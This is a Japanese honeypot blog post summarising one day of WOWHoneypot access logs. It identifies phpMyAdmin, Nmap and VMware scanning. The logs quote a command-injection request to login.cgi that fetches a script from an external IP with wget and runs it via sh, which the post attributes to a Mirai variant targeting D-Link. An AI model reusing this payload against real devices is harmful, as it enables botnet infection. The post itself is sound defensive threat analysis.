S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypotの簡易分析(39日目)

WOWHoneypotの簡易分析(39日目)

honeypot

WOWhoneypotの2018/07/12(木) (運用39日目)の簡易分析です。
本日の総アクセス件数は 70件です。以下が全アクセスログです。

44 2018-07-12 GET /
10 2018-07-12 GET /manager/html
3 2018-07-12 HEAD /
1 2018-07-12 POST /sdk
1 2018-07-12 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-12 GET /pma/scripts/setup.php
1 2018-07-12 GET /phpMyAdmin/scripts/setup.php
1 2018-07-12 GET /phpmyadmin/scripts/setup.php
1 2018-07-12 GET /NmapUpperCheck1531399944
1 2018-07-12 GET /nmaplowercheck1531399944
1 2018-07-12 GET /Nmap/folder/check1531399944
1 2018-07-12 GET /MyAdmin/scripts/setup.php
1 2018-07-12 GET /myadmin/scripts/setup.php
1 2018-07-12 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-07-12 GET /HNAP1
1 2018-07-12 GET /evox/about 

phpMyAdmin関連と/を除外したアクセス数です。

10 2018-07-12 GET /manager/html
1 2018-07-12 POST /sdk
1 2018-07-12 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-12 GET /NmapUpperCheck1531399944
1 2018-07-12 GET /nmaplowercheck1531399944
1 2018-07-12 GET /Nmap/folder/check1531399944
1 2018-07-12 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-07-12 GET /HNAP1
1 2018-07-12 GET /evox/about 

 本日もZmEuの通信を検知しましたが、phpMyAdminのスキャンでした。

また、POST /sdkという見覚えのない通信が来ていました。

POST /sdk HTTP/1.1
Content-Length: 441
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>sowl@VM-2b77ccc0-3fe1-4c8f-b571-e4e31b394960:

調べてみると、以下にNmapでvmwareのバージョンを調査するスクリプトがあり、これと特徴が一致していました。

nmap/vmware-version.nse at master · nmap/nmap · GitHub

同一の送信元IPからの通信を見ると、他に以下がありました。

1 2018-07-12 GET /NmapUpperCheck1531399944
1 2018-07-12 GET /nmaplowercheck1531399944
1 2018-07-12 GET /Nmap/folder/check1531399944
1 2018-07-12 GET /HNAP1
1 2018-07-12 GET /evox/about 

上3つは明らかにNmapですが、他の下2つもUser-Agentが同一で、恐らくは同じアクターによるスキャンと思われます。

なお、一番下については、以下の記事があり、これもNMAPと思われます。

nmap/http-trane-info.nse at master · nmap/nmap · GitHub

 

本日のハンティングログは以下です。D-Linkの脆弱性をつくMirai亜種Shinoaの通信です。

1 2018-07-12 wget hxxp://185.62.190.191/ 

 

以上です。